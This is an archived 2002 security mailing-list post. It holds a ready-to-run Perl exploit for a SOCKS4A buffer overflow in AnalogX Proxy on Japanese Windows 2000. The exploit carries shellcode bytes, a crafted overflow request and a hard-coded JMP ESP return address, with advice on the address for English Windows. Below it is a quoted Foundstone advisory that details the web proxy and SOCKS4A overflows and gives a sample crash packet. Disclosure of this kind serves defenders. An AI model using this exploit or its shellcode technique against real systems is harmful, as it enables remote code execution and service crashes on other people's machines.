This is a proof of concept exploit for AnalogX Proxy SOCKS4A buffer
overflow. Tested on Japanese Windows 2000 Professional SP2.
#!/usr/local/bin/perl
#-----------------------------------------------------------
# AnalogX Proxy Version 4.10 exploit for Japanese Windows 2000 Pro (SP2)
# written by Kanatoko <anvil_at_jumperz.net>
# http://www.jumperz.net/
# thanx to: hsj (http://hsj.shadowpenguin.org/)
#-----------------------------------------------------------
use Socket;
$connect_host = "socks.example.com";
$port = 1080;
$iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n";
$sock_addr = pack_sockaddr_in($port,$iaddr);
socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n";
connect(SOCKET,$sock_addr) || die "Connect Error\n";
select(SOCKET); $|=1; select(STDOUT);
# egg written by UNYUN (http://www.shadowpenguin.org/)
# 57bytes
$egg = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .= "notepad.exe";
$buf = "\x04\x01\x00\x19\x00\x00\x00\x01";
$buf .= "A" x 32;
$buf .= $egg;
$buf .= "\x00";
$buf .= "A" x 144;
# JMP ESP in user32.dll( Japanese Windows 2000 Pro SP2 ) : 0x77DF492B
# If you use English Windows 2000, try 0x77E2492B
$buf .= "\x2B\x49\xdf\x77";
# JMP +0x22
$buf .= "\xEB\x22";
$buf .= "\x00";
print SOCKET $buf;
--
Kanatoko <anvil_at_jumperz.net>
JUMPER : http://www.jumperz.net/(Japanese)
On Mon, 1 Jul 2002 15:54:55 -0600 (MDT)
Dave Ahmad <da_at_securityfocus.com> wrote:
>
>
> Dave Ahmad
> SecurityFocus
> www.securityfocus.com
>
> ---------- Forwarded message ----------
> Return-Path: <labs_at_foundstone.com>
> Delivered-To: da_at_securityfocus.com
> Received: (qmail 13630 invoked from network); 1 Jul 2002 21:32:14 -0000
> Received: from unknown (HELO mission.foundstone.com) (66.192.0.2)
> by mail.securityfocus.com with SMTP; 1 Jul 2002 21:32:14 -0000
> X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
> content-class: urn:content-classes:message
> MIME-Version: 1.0
> Content-Type: text/plain;
> charset="us-ascii"
> Content-Transfer-Encoding: quoted-printable
> Subject: Foundstone Advisory - Buffer Overflow in AnalogX Proxy
> Date: Mon, 1 Jul 2002 14:37:44 -0700
> Message-ID: <9DC8A3D37E31E043BD516142594BDDFAC47577_at_MISSION.foundstone.com>
> X-MS-Has-Attach:
> X-MS-TNEF-Correlator:
> Thread-Topic: Foundstone Advisory - Buffer Overflow in AnalogX Proxy
> Thread-Index: AcIhR4n3TkCXBJz4TAqNDSFSrIolUg==
> From: "Foundstone Labs" <labs_at_foundstone.com>
> To: <da_at_securityfocus.com>
>
> ----------------------------------------------------------------------
> FS Advisory ID: FS-070102-23-AXPR
>
> Release Date: July 1st, 2002
>
> Product: AnalogX Proxy
>
> Vendor: AnalogX (http://www.analogx.com)
>
> Vendor Advisory: See vendor web site
>
> Type: Buffer Overflow
>
> Severity: High
>
> Author: Robin Keir (robin.keir_at_foundstone.com)
> Foundstone, Inc.
> (http://www.foundstone.com)
>
> Operating Systems: Windows variants
>
> Vulnerable versions: Proxy v4.07 and previous
>
> Foundstone Advisory: http://www.foundstone.com/advisories.htm
> ---------------------------------------------------------------------
>
> Description
>
> A buffer overflow exists in AnalogX's Proxy software.
> Exploitation of this vulnerability allows remote execution of
> arbitrary code with the privileges of the Proxy daemon.
>
> Details
>
> Web Proxy overflow
>
> Sending a HTTP proxy request to the target system on TCP port 6588
> consisting of a single space character followed by 320 or more
> non-space characters followed by 2 carriage-return linefeeds causes
> a read access violation in the application. Manually dismissing the
> application error message box that is displayed on the affected system
> at this point will terminate the process. If the message box is not
> manually dismissed then repeated sending of the request causes repeated
> access violation message boxes to appear on the affected system up to
> the point where the service no longer responds.
>
> Different number of bytes sent cause different error conditions
> to occur, such as write access violations and Watcom memory
> error dialogs to appear.
>
> Socks4a buffer overflow.
>
> Sending a Sock4a request to the target system on TCP port 1080
> consisting
> of a hostname section of 140 or more characters will cause a write
> access
> violation application error. Manually dismissing the application error
> message box that is displayed on the affected system at this point will
> terminate the process. If the message box is not manually dismissed then
>
> repeated sending of the request causes repeated access violation message
>
> boxes to appear on the affected system up to the point where the service
>
> no longer responds.
>
> An example TCP packet to send is
>
> \x04\x01\x04\x38\x00\x00\x00abcd\x00#\x00
>
> where the '\xXX' characters signify their corresponding HEX binary
> values and
> the '#' is substituted with the DNS name of 140 or more characters.
>
> Solution:
>
> Refer to the vendor's web site for further details:
> http://www.analogx.com
>
> Credits:
>
> Foundstone would like to thank AnalogX for their prompt
> response and handling of this problem.
>
>
> Disclaimer:
>
> The information contained in this advisory is copyright (c) 2002
> Foundstone, Inc. and is believed to be accurate at the time of
> publishing, but no representation of any warranty is given,
> express, or implied as to its accuracy or completeness. In no
> event shall the author or Foundstone be liable for any direct,
> indirect, incidental, special, exemplary or consequential
> damages resulting from the use or misuse of this information.
> This advisory may be redistributed, provided that no fee is
> assigned and that the advisory is not modified in any way.
>
>
Received on Jul 26 2002
Intro
